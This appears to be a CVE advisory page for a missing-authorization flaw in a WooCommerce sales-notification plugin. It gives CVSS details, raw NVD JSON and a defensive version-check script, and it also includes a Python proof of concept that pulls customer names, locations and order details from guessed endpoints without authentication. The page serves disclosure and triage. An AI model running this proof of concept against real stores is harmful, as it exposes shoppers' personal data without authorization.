Security Vulnerability Report
CVE-2025-12955 CVSS 7.5 HIGH

CVE-2025-12955

Published: 2025-11-18 10:15:49
Last Modified: 2026-04-15 00:35:42

Description

The Live sales notification for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.3.39. This is due to the "getOrders" function lacking proper authorization and capability checks when the plugin is configured to display recent order information. This makes it possible for unauthenticated attackers to extract sensitive customer information including buyer first names, city, state, country, purchase time and date, and product details.

The weakness is classed as CWE-862 (Missing Authorization). The CVSS vector (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) reflects an unauthenticated, network-reachable disclosure of customer data with no integrity or availability impact; the 7.5 score is driven entirely by the confidentiality component. Note the precondition in the description: the handler is only reachable in this way when the plugin is configured to display recent order information.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available for this entry (NVD vulnStatus: Deferred).

Affected: Live Sales Notifications for WooCommerce <= 2.3.39 (all versions up to and including 2.3.39)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import json
import requests

# CVE-2025-12955 PoC - Unauthenticated Access to Order Information
# Target: WordPress site with Live Sales Notifications for WooCommerce plugin <= 2.3.39

target_url = "http://target-wordpress-site.com"

# Candidate endpoints. These paths are guesses: the advisory only names the
# "getOrders" function, not the AJAX action or REST route that exposes it.
# Confirm the real route from the plugin source before trusting a negative result.
api_endpoints = [
    "/wp-json/lsnf/v1/orders",
    "/wp-admin/admin-ajax.php?action=getOrders",
    "/wp-admin/admin-ajax.php?action=lsnf_get_orders",
]

print("[*] CVE-2025-12955 PoC - Testing for Missing Authorization in getOrders function")
print("[*] Target:", target_url)

for endpoint in api_endpoints:
    url = target_url + endpoint
    print(f"\n[+] Testing endpoint: {endpoint}")
    try:
        # No cookie, nonce or credentials are sent: the missing authorization check
        # is the vulnerability, so an unauthenticated GET is the whole test.
        response = requests.get(url, timeout=10)
        if response.status_code == 200:
            try:
                data = response.json()
                if isinstance(data, list) or (isinstance(data, dict) and "orders" in data):
                    print("[!] VULNERABLE! Received order data without authentication")
                    print("[!] Sample data preview:")
                    print(json.dumps(data[:3] if isinstance(data, list) else data, indent=2))
                    # Extract customer information. The field names below are assumed;
                    # the advisory lists the data categories, not the JSON keys.
                    orders = data if isinstance(data, list) else data.get("orders", [])
                    for order in orders:
                        if not isinstance(order, dict):
                            continue
                        customer_info = {
                            "name": order.get("first_name", "N/A"),
                            "city": order.get("city", "N/A"),
                            "state": order.get("state", "N/A"),
                            "country": order.get("country", "N/A"),
                            "product": order.get("product_name", "N/A"),
                            "time": order.get("order_time", "N/A"),
                        }
                        print(f"[+] Customer: {customer_info['name']} from "
                              f"{customer_info['city']}, {customer_info['country']}")
            except ValueError:
                # requests raises a JSONDecodeError subclass of ValueError on non-JSON bodies
                print(f"[*] Non-JSON response (status {response.status_code})")
        else:
            print(f"[*] Status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")

print("\n[*] PoC completed")
print("[*] Note: This PoC is for authorized security testing only")
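The PoC above only confirms exposure by pulling live customer data through the vulnerable handler, and its endpoint paths are guesses. For triage it is usually enough to establish whether the installed version falls in the affected range (<= 2.3.39) without touching order data at all. The following is an added example, not code from the advisory or from the plugin: it reads the plugin's public readme.txt and compares its "Stable tag:" against the advisory's version bound. It assumes the plugin slug live-sales-notifications-for-woocommerce (taken from the plugins.trac.wordpress.org reference URL) and the standard wp-content/plugins/<slug>/readme.txt layout; the sample readme text is constructed for the offline run.

```python
"""Version-based exposure check for CVE-2025-12955.

Added example, not from the advisory. Compares a plugin's public
"Stable tag:" against the affected range (<= 2.3.39) instead of
exercising the vulnerable getOrders handler.

Assumptions not stated on the advisory page:
  * plugin slug: live-sales-notifications-for-woocommerce (from the
    plugins.trac.wordpress.org reference URL);
  * the site serves wp-content/plugins/<slug>/readme.txt unmodified.
"""
import re
import sys
import urllib.request

PLUGIN_SLUG = "live-sales-notifications-for-woocommerce"
LAST_AFFECTED = "2.3.39"  # upper bound of the affected range from the advisory


def parse_version(version: str) -> tuple:
    """Turn "2.3.39" into (2, 3, 39) so comparisons are numeric.

    A plain string comparison misorders "2.3.4" and "2.3.39" ("4" > "3"),
    which would report a vulnerable 2.3.4 install as patched. Trailing
    non-numeric suffixes such as "-beta" are dropped.
    """
    parts = []
    for piece in version.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    if not parts:
        raise ValueError(f"unparseable version string: {version!r}")
    return tuple(parts)


def is_affected(version: str) -> bool:
    """True when version <= 2.3.39, i.e. inside the advisory's range."""
    return parse_version(version) <= parse_version(LAST_AFFECTED)


def stable_tag(readme_text: str):
    """Extract the "Stable tag:" header from a WordPress.org-style readme.txt.

    Returns None when the header is absent or set to "trunk", in which case
    the file does not tell us which release is installed.
    """
    m = re.search(r"^\s*Stable tag:\s*(\S+)", readme_text, re.MULTILINE | re.IGNORECASE)
    if not m or m.group(1).lower() == "trunk":
        return None
    return m.group(1)


def assess_readme(readme_text: str) -> dict:
    """Verdict for one readme: version found, whether it is in range, and why."""
    tag = stable_tag(readme_text)
    if tag is None:
        return {"version": None, "affected": None, "reason": "no usable Stable tag"}
    return {
        "version": tag,
        "affected": is_affected(tag),
        "reason": f"Stable tag {tag} compared with <= {LAST_AFFECTED}",
    }


def fetch_readme(base_url: str, timeout: int = 10) -> str:
    """GET the plugin readme from a site (only used when a URL is passed on the CLI)."""
    url = f"{base_url.rstrip('/')}/wp-content/plugins/{PLUGIN_SLUG}/readme.txt"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample in the WordPress.org readme format; not the plugin's real file.
SAMPLE_README = """=== Live Sales Notifications for WooCommerce ===
Stable tag: 2.3.39
License: GPLv2 or later
"""

if __name__ == "__main__":
    text = fetch_readme(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_README
    print(assess_readme(text))
```

Run it with a site URL as the only argument to check a live install, or with no argument to see the verdict for the constructed sample. Treat the result as a screening signal rather than proof: a site that blocks or customises readme.txt, or that installed the plugin from somewhere other than WordPress.org, will yield no tag or a misleading one, and the advisory ties exploitability to the plugin being configured to display recent order information, which a version string cannot tell you.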

References

https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394241%40live-sales-notifications-for-woocommerce&old=3389540%40live-sales-notifications-for-woocommerce&sfp_email=&sfph_mail= (plugin repository changeset, revisions 3389540 to 3394241)
https://www.wordfence.com/threat-intel/vulnerabilities/id/1cebcf16-ae7f-45c4-8e1d-80ede4c32106?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12955", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:48.710", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Live sales notification for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.3.39. This is due to the \"getOrders\" function lacking proper authorization and capability checks when the plugin is configured to display recent order information. This makes it possible for unauthenticated attackers to extract sensitive customer information including buyer first names, city, state, country, purchase time and date, and product details."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394241%40live-sales-notifications-for-woocommerce&old=3389540%40live-sales-notifications-for-woocommerce&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1cebcf16-ae7f-45c4-8e1d-80ede4c32106?source=cve", "source": "[email protected]"}]}}